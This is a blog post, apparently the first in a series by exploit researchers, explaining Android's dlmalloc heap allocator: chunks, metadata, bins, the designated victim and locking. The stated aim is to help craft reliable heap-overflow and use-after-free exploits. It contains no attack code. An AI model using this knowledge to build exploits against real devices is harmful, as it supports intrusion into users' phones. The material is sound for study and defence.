  • dlmalloc only has the big lock, jemalloc has fine grained mutexes which reduce lock contention
  • jemalloc has thread specific free lists (aka tcaches) to further increase multithreading performance
  • jemalloc has a garbage collection mechanism which helps to clean up tcaches.
  • Recently freed chunks or regions on dlmalloc are reused in a FIFO fashion, while on jemalloc they are reused LIFO.

In our estimation, we believe that the current distribution of devices in use is about 70% jemalloc and 30% dlmalloc. This is largely due to the fact that most people update their phones relatively frequently, skewing the distribution towards the more modern jemalloc based systems. Even though the bulk of devices are on jemalloc, it is still necessary to exploit dlmalloc devices in order to get good real-world coverage. For example, certain geographical regions are more likely to have dlmalloc based phones.

A Tale of Two Mallocs: On Android libc Allocators – Part 1 – dlmalloc

In this series of three posts, we’re going to try to cover a deep dive into the pertinent details of the two Android libc allocators, followed by some thoughts on exploitation in light of those allocators.

All of the information I’ll impart is the result of our own research into the allocators in question, including a thorough code review of the implementations of those allocators. That said, much of the information is available online in one form or another. I’ve yet to encounter a concise but in-depth description of both allocators and the relevant exploitation techniques. Hopefully that’s what this presentation will provide.

It’s 2018. The days of trivially exploitable stack buffer overflows are over. Modern exploitable vulnerabilities fall into a few meager classes, we’ll focus on two of these.

Even at this late stage in the game, memory corruption bugs are still a thing. Chief among these is the good old buffer overflow. Stack cookies have largely neutered the exploitability of stack based memory corruptions, so most modern memory corruption vulnerabilities are in objects and buffers on the heap.

In addition to these heap-based memory corruption vulnerabilities, we have use-after-free vulnerabilities.

This class of bugs is all about heap objects coupled with bad memory management practices.

Together these two classes make up a very large portion of the exploitable bugs we find in modern software.

What these classes of bugs have in common is that they both occur mostly in heap objects. Understanding how the heap works is a critical, often overlooked, step in crafting reliable exploits for these kinds of vulnerabilities.

Other prevalent classes of bugs are type confusions and race conditions. We’re not going to focus on those here, because they are not necessarily heap-related.

When we talk about the ‘heap’, what we usually mean is any and all memory objects which are managed using the libc malloc/free interface. This very simple interface lets us allocate so-called “dynamic memory” for our use, and free it when we are done using it. When we approach the task of exploiting a heap-overflow or a use-after-free, it’s not enough to know the semantics of this interface. We need to know what is happening under the hood.

Android uses its own libc implementation, called bionic. When the Android developers came to implement these heap functions, they wisely chose to use an existing, battle tested implementation instead of rolling their own.

dlmalloc

The dynamic memory allocator implementation they chose is called dlmalloc. It’s named after its author, Doug Lea. Doug started writing this allocator way back in 1987. It has received many updates and improvements over the years, and was last updated in 2012.

When you call malloc, dlmalloc does a bunch of stuff behind the scenes, and will eventually return a pointer to a block of contiguous memory which you can use in your program. This block is called a ‘chunk’, and is guaranteed to be at least as big as the size you requested.

These chunks don’t come from nowhere. When dlmalloc needs memory to use for chunks, it requests an allocation from the operating system. Each such system allocation is called a ‘segment’.

Segments are the base unit of allocation from the OS. dlmalloc keeps a linked list of segments it has allocated from the system, with the pointers stored in the segment’s footer. The most recently allocated segment is the ‘current’ segment. When it needs more system memory, dlmalloc first tries to extend the current segment using sbrk, falling back to mmap-ing a new segment if that doesn’t work. Segments can be of different sizes, but are always a multiple of the page size. Segments are not guaranteed to be adjacent to one another in memory, and, in fact, are allocated at random addresses when system-wide ASLR is enabled, as it is on Android. If a new segment happens to be contiguous to an existing segment, the two segments are consolidated into a single larger segment.

The current segment contains the ‘top chunk’, which is the chunk of free space available for immediate allocation of chunks. Here’s an example ‘current’ segment, with in use (allocated) chunks in light green and free (unallocated) chunks in blue.

When dlmalloc needs to allocate a new chunk for a malloc call, it will check if the top chunk is big enough to contain the new chunk, and will carve the new chunk from within the top chunk by splitting it. The first half of the top chunk becomes the new chunk to be returned, and the second half becomes the new ‘top chunk’. If the ‘top chunk’ is not large enough to contain the new chunk, a new segment is allocated from the operating system, and the new chunk is allocated from that new segment.

Each chunk has two pointers worth of metadata: in 32bit processes this is 8 bytes. This metadata sits directly before the pointer returned by malloc, i.e. inline before the useable memory. The minimum amount of actual usable memory returned by malloc is two pointers wide.

Chunks of different sizes can be allocated one after the other in the segments. Each chunk marks its size and whether it is in use or not, via the C_INUSE flag. It also marks whether the previous chunk in the segment is in use, with the P_INUSE flag, and the previous chunk’s size. Because the metadata contains the size of the previous chunk, we can easily walk backwards through the chunks in a segment.

When you call free on a given chunk, the first thing that happens is that dlmalloc checks to see if the preceding chunk is in use. If the preceding chunk is free, dlmalloc will consolidate the two chunks into one larger free chunk.

This means that it is impossible for two consecutive chunks in a segment to both be free. The chunks immediately before and after a free chunk are both guaranteed to be in use.

Simple right? Obviously what we’ve described is a pretty naïve allocator implementation. There’s a little more to it. Specifically, what we’ve described is a system which never reuses freed memory, as it always allocates from the ‘top chunk’. So how do we efficiently reuse freed memory?

We need some bins.

Bins are used to keep a record of recently freed chunks which can be reused. There are two types of bins: ‘small’ and ‘tree’. Small bins are used for chunks smaller than 0x100 bytes. Each small bin contains chunks of the same size. Tree bins are used for larger chunks, and contain chunks of a given range of sizes. Small bins are implemented as simple doubly-linked lists, and tree bins are implemented as bitwise digital trees (aka ‘tries’), keyed on chunk size. There are 32 small bins and 32 tree bins.

When a chunk is freed, it undergoes consolidation if needed, and then the consolidated chunk is added to the appropriate bin for its size. The list and tree node pointers are stored within the actual chunk data, which is safe to use for metadata as it is ‘free’. This is where the minimum size for a chunk comes from: we need space for previous and next pointers in the free chunk’s data.

Here’s an example showing a few segments with some in use and free chunks. The 0x18 bin points to the first of the free chunks of size 0x18, and the rest of them are chained together in a doubly-linked-list.

Note that small bins contain chunks of exactly one size. Tree bins contain ranges of chunk sizes.

dlmalloc is a best fit allocator. It will always try to find the free chunk with the smallest size greater or equal to the request size.

During allocation, before looking at the ‘top chunk’, dlmalloc will first try to find a free chunk in the bins. It first tries to find a chunk which matches the exact size of the allocation request, and then moves upwards through the non-empty bins till it finds the smallest chunk which is larger than the request. If a larger chunk is used, it will be split, and the remainder will be added to the relevant bin to possibly be used for future allocations. Only if no chunk exists in the bins to satisfy the allocation request will the ‘top chunk’ be used.

Note that the bins are First In First Out. So chunks are allocated in the order that they were freed. This can be an important factor in exploitation.

After looking in the bins for an exact size match, but before going to the ‘top chunk’, dlmalloc will try to see if the ‘designated victim’ is large enough to contain the allocation request.

The ‘designated victim’ is the preferred chunk for servicing small requests that don’t have an exact fit. It is the chunk which was most recently split off. It doesn’t sit in any bin. Having the ‘designated victim’ helps to localize allocations to a given memory segment, which can be useful when considering how CPU caches work. Small allocations which don’t have an exact fit in the bins will be split off from this chunk.

So for a small allocation, a request size smaller than 0x100 bytes, this is the flow:

  • We first calculate the exact size including metadata and padding
  • We then look for an exact match in the small bins
  • If that fails, we next see if the ‘designated victim’ is large enough to allocate from
  • If the ‘designated victim’ is too small, we then look for a ‘best fit’ in the small bins larger than our request size
  • If that fails, we look in the tree bins for a ‘best fit’ match
  • Finally, if all else has failed, we look at the top chunk, potentially causing more memory to be allocated from the system.

Larger allocations are a little simpler. We just try to allocate from the tree bins before attempting the ‘designated victim’ and then the top chunk.

There are no bins for so-called very large allocations, which means anything larger than the MMAP_THRESHOLD, which is 64kb on Android. These allocations don’t come from the segments. Instead, each such allocation is mmaped directly.

So that’s dlmalloc in a nutshell. Hopefully I’ve covered all the salient points. There are a couple of things we should note before moving on.

While dlmalloc takes some steps to reduce fragmentation of the heap, particularly the reuse of freed chunks based on bin size, it is still common for smaller free chunks to become trapped between larger consecutive chunks which often remain in use for longer periods in application flow.

dlmalloc is not thread safe. At all. Both malloc and free touch process global data structures and the inline metadata between chunks and inside free chunks. Remember that dlmalloc was designed long before the Age of Parrellism, before every application was multithreaded, before hyper-threading and multi-core processors. To make dlmalloc usable in multi-threaded processes, Doug Lee chose the simplest possible fix: the big lock.

Every single malloc or free call locks a global mutex on entry and unlocks at function exit. This makes dlmalloc usable with threads, but has a major performance impact. Essentially all allocator operations are serialized. This is ok on lightly multi-threaded processes, but can be a significant drag on more complex applications

The poor multithreading performance of dlmalloc is one of the main reasons that the bionic developers decided to switch to a more modern heap implementation.

That wraps up the discussion of dlmalloc. Read the next post in this series to find out about jemalloc, the more modern Android libc allocator.